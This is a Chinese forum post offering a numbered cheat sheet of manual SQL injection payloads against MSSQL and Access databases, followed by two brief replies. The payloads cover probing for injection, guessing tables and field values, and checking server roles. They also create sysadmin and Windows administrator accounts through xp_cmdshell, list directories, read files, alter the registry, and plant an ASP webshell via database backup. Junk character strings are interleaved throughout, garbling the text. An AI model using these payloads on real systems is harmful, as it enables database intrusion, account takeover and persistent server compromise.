社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3906阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 ,3VG.u;U   
  2.初步判断是否是mssql ;and user>0 /Qr A8  
ky'|Wk6   
  3.注入参数是字符'and [查询条件] and ''=' }Q`/K;yq  
/lf\ E=  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' b%3Q$wIJ6  
- ,R0IGS  
  5.判断数据库系统 +DicP"~*  
!aQIh  
  ;and (select count(*) from sysobjects)>0 mssql k!Vn4?B"k  
Q8 -3RgAw  
  ;and (select count(*) from msysobjects)>0 access ,"@w>WL<9  
@b]VCv0*f%  
I") H~  
M{*kB2jr  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 `ifb<T  
d-hbvLn  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 IKvd!,0xf  
w|&,I4["  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 vAi"$e  
1T!cc%ah  
  9.(1)猜字段的ascii值(access) kX igX-  
$=\d1%_R|  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 P\.WXe#j  
]9fS@SHdx  
  (2)猜字段的ascii值(mssql) _i-\mR_~  
{V.Wk  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 D`V6&_. p  
lrCm9Oy  
  10.测试权限结构(mssql) mRwXN*Izw  
b([:,T7  
\$'R+k-57;  
VxNXd?  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <[bQo&B2 E  
z|uOJ0uK  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- bi+9R-=&  
hl`u"?rg  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7@JjjV  
Y^4q9?2G  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- %WZ$]M?q  
n4Vwao/9x  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Bu&So|@TL  
'[%jjUU  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- #?_#!T|  
U4]30B{;H  
  ;and 1=(select IS_MEMBER('db_owner'));-- l@xWQj9  
)GK+  
U4=]#=R~o  
s} s|~  
  11.添加mssql和系统的帐户 -=5EbNPwG  
C B6A}m  
  ;exec master.dbo.sp_addlogin username;-- : g 5(HH  
  ;exec master.dbo.sp_password null,username,password;-- xg?auje  
:Pc(DfkS  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- *u}'}jC1X  
{aoM JJq  
  ;exec master.dbo.xp_cmdshell 'net user username password hv3;irK]&  
KyjyjfIwH  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- eap8*ONl  
ubi~%  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- hzq5![/sV  
z4bN)W )p  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 7H4L-J3  
wE?CvL  
=x1Wii$`  
bf1)M>g,O  
  12.(1)遍历目录 5} G:D  
,[Ag~.T  
  ;create table dirs(paths varchar(100), id int) q~j)W$k  
UoHd-  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' i*'Z3Z)  
PYu$1o9+N  
  ;and (select top 1 paths from dirs)>0 *Z; r B  
`UQEXoB)  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) YtpRy% R  
V:OiW"/  
GB =bG%Tb  
>nK%^T  
  (2)遍历目录 L:pUvcAc?  
Q(e{~ ]*  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ~;8I5Sge  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 J+|/-{g  
V 9Hl1\j^  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 $it@>L8  
e^8BV;+c  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 WFem#hq   
Gc'M[9Mh  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 AuXs B  
l sr?b  
o,*=$/or  
</=3g>9Z  
  13.mssql中的存储过程 ^KbL ,T  
Bzw19S6y  
  xp_regenumvalues 注册表根键, 子键 1x{kl01m%  
\7 Gz\=\LR  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 #Kl}= 1 4  
nmg{%P  
  xp_regread 根键,子键,键值名 03_pwB)^  
j8a[ (  
  ;exec xp_regread *VDVC0R  
=k_UjwgN^  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 qnXTNs ?b  
{OP~8e"  
  xp_regwrite 根键,子键, 值名, 值类型, 值 \c% g M1  
%K l(>{N  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ZLrHZhP-+  
h/?6=D{  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 9`Vc  
S3y246|4  
  xp_regdeletevalue 根键,子键,值名 \=fh-c(J,  
+?AW>&68y  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 `HyF_m>\  
:c:V%0Yji  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 l9J*um-  
Ww`&i  
AY88h$a  
M*`hDdS  
  14.mssql的backup创建webshell x.UaQ |F  
6|#g+&[  
  use model }#/l N  
vaB!R 0  
  create table cmd(str image); D/:3R ZF  
T 1zi0fa'  
  insert into cmd(str) values (''); ix*muVBj.  
f^e&hyC   
  backup database model to disk='c:\l.asp'; L!y"d!6C  
 =:~(m  
o;J;k_[MX  
ti2  
  15.mssql内置函数 7 :U8 f:  
I`^YAbnb  
  ;and (select @@version)>0 获得Windows的版本号 "~\*If  
fp;a5||5  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa WeVi] n  
9)lZyE}   
  ;and (select user_name())>0 爆当前系统的连接用户 N!c gN  
Uw <{i  
  ;and (select db_name())>0 得到当前连接的数据库  hY=I5[*  
38Efp$)  
_yVPpA[a  
88o:NJ}_  
  16.简洁的webshell Zi{0-m6+  
% rcFT_  
  use model N`1r;%5  
v3-?CQb(  
  create table cmd(str image); =DMbz`t  
ik\S88|  
  insert into cmd(str) values (''); (.Xr#;\(  
zH=hI Vc  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八